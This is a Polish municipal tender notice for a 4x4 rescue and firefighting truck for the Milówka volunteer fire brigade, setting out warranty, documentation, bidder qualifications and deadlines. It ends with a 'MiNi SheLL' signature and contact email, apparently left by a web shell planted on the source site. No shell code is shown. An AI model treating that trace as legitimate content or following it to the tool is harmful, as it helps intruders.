Wykonanie napisów na drzwiach kabiny kierowcy- Ochotnicza Straż Pożarna w Milówce, oznakowania numerami  operacyjnymi zgodnie z obowiązującymi wymogami KG PSP oraz oznakowania zgodnie z instrukcją oznakowania przedsięwzięć dofinansowanych za pośrednictwem Związku OSP RP.
Samochód powinien posiadać oznakowanie odblaskowe konturowe. Oznakowanie powinno znajdować się możliwie najbliżej poziomych i pionowych krawędzi samochodu	
OGÓLNE	
Gwarancja podstawowa na samochód  - min. 24  miesiące, 
Gwarancja powinna  obejmować bezpłatne naprawy  podwozia i bezpłatne przeglądy techniczne w ciągu min.2 lat w ASO Autoryzowanych Stacjach Obsługi na terenie RP
Koszty oferty powinny uwzględniać :
koszty przeglądu w ASO w ciągu min. 2 lat 
koszty wszystkich części potrzebnych do przeglądów technicznych w ciągu min.2 lat
Gwarancja na  zabudowę pożarniczą - min.24 miesiące 
Gwarancja powinna obejmować  bezpłatne naprawy w ramach gwarancji,  nadwozia  w ciągu min.2 lat 
Zgodnie z treścią art. 29 ust. 3 Prawo zamówień publicznych (Dz. U. z 2013 r., poz. 907 z późn. zm.) jeżeli w opisie przedmiotu zamówienia wskazane są konkretne rozwiązania techniczne, dopuszcza się stosowanie rozwiązań równoważnych, co do ich cech i parametrów, a  wszystkie ewentualne nazwy firmowe urządzeń i wyrobów użyte w opisie przedmiotu zamówienia powinny być traktowane jako definicje standardowe, a nie konkretne nazwy firmowe urządzeń wyrobów zastosowanych w dokumentacji. Obowiązek udowodnienia równoważności leży po stronie Wykonawcy.
Gwarancja, rękojmia i serwis:
minimum 24 miesiące
serwis gwarancyjny dostępny na terenie całego kraju.
Termin wykonania zamówienia: od dnia podpisania umowy do 30.10.2015 r.
Minimalny wymagany przez Zamawiającego okres gwarancji i rękojmi  za przedmiot zamówienia wynosi 24 miesiące. Jeżeli wykonawca nie wskaże w formularzu ofertowym załącznik nr 1 do SIWZ okresu gwarancji i rękojmi, wtedy Zamawiający za okres gwarancji i rękojmi przyjmuje minimalny wymagany okres gwarancji.
Dostarczony samochód musi posiadać parametry techniczne nie gorsze niż podane przez Zamawiającego. 
W cenie ofertowej należy uwzględnić koszt pełnego baku paliwa w celu dojazdu samochodu do siedziby Zamawiającego.
Przed przejęciem samochodu, Zamawiający będzie mógł powołać własnego rzeczoznawcę do oceny jego parametrów.
Pozostałe wymagania:
Wykonawca udzieli gwarancji i rękojmi na przedmiot zamówienia minimum na 24 miesiące. Warunki gwarancji i serwisu zostały opisane we wzorze umowy zał. nr. 7 do SIWZ. Okres gwarancji liczony będzie od daty sporządzenia protokołu zdawczo-odbiorczego.
Wykonawca dostarczy najpóźniej w dniu dostawy niezbędną dokumentację w języku polskim:
instrukcję obsługi i konserwacji pojazdu i sprzętu wyposażenia w języku polskim - 2 szt., oraz dodatkowo 1 szt. na płycie CD, zawierające w szczególności normy zużycia paliwa dla pojazdu. 
książkę gwarancyjną dla pojazdu i wyposażenia w języku polskim, zgodną z zapisami niniejszej umowy - 1szt.
świadectwo dopuszczenia zgodne z rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 27 kwietnia 2010 r. w sprawie wykazu wyrobów służących zapewnieniu bezpieczeństwa publicznego lub ochronie zdrowia i życia oraz mienia, a także zasad wydawania dopuszczenia tych wyrobów do użytkowania (Dz. U. z 2010 r., nr 85, poz. 553 z późń. zm.) - szt. 1 kserokopia poświadczona za zgodność z oryginałem dla średniego samochodu ratowniczo-gaśniczego oraz sprzętu, jeżeli będzie dla niego wymagane,
dokumentację niezbędną do rejestracji pojazdu,
wykaz dostarczonego sprzętu wyposażenia, stanowiącego wyposażenie pojazdu,
wyciąg ze świadectwa homologacji dla typu pojazdu,
gwarancję na sprzęt.
Wykonawca zapewni na swój koszt szkolenie w zakresie obsługi i konserwacji pojazdu.
Szkolenie z obsługi przedmiotu niniejszej umowy wraz z instruktażem obsługi całego wyposażenie odbędzie się w siedzibie Wykonawcy szkolącego w ciągu jednego dnia roboczego. Protokół 
z przeprowadzonego szkolenia wraz z wykazem przeszkolonych osób zostanie sporządzony w 2 egzemplarzach, każdy na prawach oryginału, po jednym egzemplarzu dla Zamawiającego i Wykonawcy oraz podpisany przez obie strony. Jeżeli zajdzie taka konieczność na wniosek Zamawiającego, Wykonawcy przeprowadzi dodatkowe szkolenie z obsługi przedmiotu niniejszej umowy w siedzibie Użytkownika w terminie 30 dni od dnia przeprowadzenia pozytywnego odbioru faktycznego sprzętu bez limitu osób. Również z tego szkolenia zostanie sporządzony protokół z wykazem przeszkolonych osób w 3 egzemplarzach, każdy na prawie oryginału, 2 egzemplarze dla Zamawiającego i 1 egzemplarz dla Wykonawcy oraz podpisany przez przedstawicieli obu stron..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.14.42.10-3, 35.11.00.00-8, 34.14.42.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa wymagań w tym zakresie.Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie analizy formalno-prawnej i merytorycznej oświadczeń i dokumentów złożonych przez wykonawców. Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat  przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane  oraz załączy dowody czy zostały wykonane lub są wykonywane należycie. 
            Za usługę zgodną z przedmiotem zamówienia zamawiający uzna wykonanie co najmniej dwóch dostaw fabrycznie nowego średniego samochodu ratowniczo - gaśniczego z napędem 4x4,  wraz z podaniem wartości, daty  i miejsca wykonania dostawy, 
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie analizy formalno-prawnej i merytorycznej oświadczeń i dokumentów złożonych przez wykonawców. Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa wymagań w tym zakresie.Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie analizy formalno-prawnej i merytorycznej oświadczeń i dokumentów złożonych przez wykonawców. Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa wymagań w tym zakresie.Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie analizy formalno-prawnej i merytorycznej oświadczeń i dokumentów złożonych przez wykonawców. Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa wymagań w tym zakresie.Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie analizy formalno-prawnej i merytorycznej oświadczeń i dokumentów złożonych przez wykonawców. Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Opis parametrów technicznych przedmiotu zamówienia (zgodnie z Załącznikiem Nr 2 do SIWZ)</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pozostałe oświadczenia i dokumenty:
wypełniony Formularz ofertowy (Załącznik Nr 1 do SIWZ),                                                                                                                                                                                                                                                                                                                                                                                                                                                             
w przypadku złożenia oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia - pełnomocnictwo do reprezentowania wykonawców w niniejszym postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego,
pełnomocnictwo udzielane osobom podpisującym dokumenty ofertowe, o ile prawo do reprezentowania wykonawcy w powyższym zakresie nie wynika wprost z dokumentów rejestrowych.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - okres udzielonej gwarancji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.milowka.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Milówka
ul. Jana Kazimierza 123
34-360 Milówka.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.08.2015 godzina 13:00, miejsce: Urząd Gminy Milówka 
ul. Jana Kazimierza 123
34-360 Milówka
Dziennik podawczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com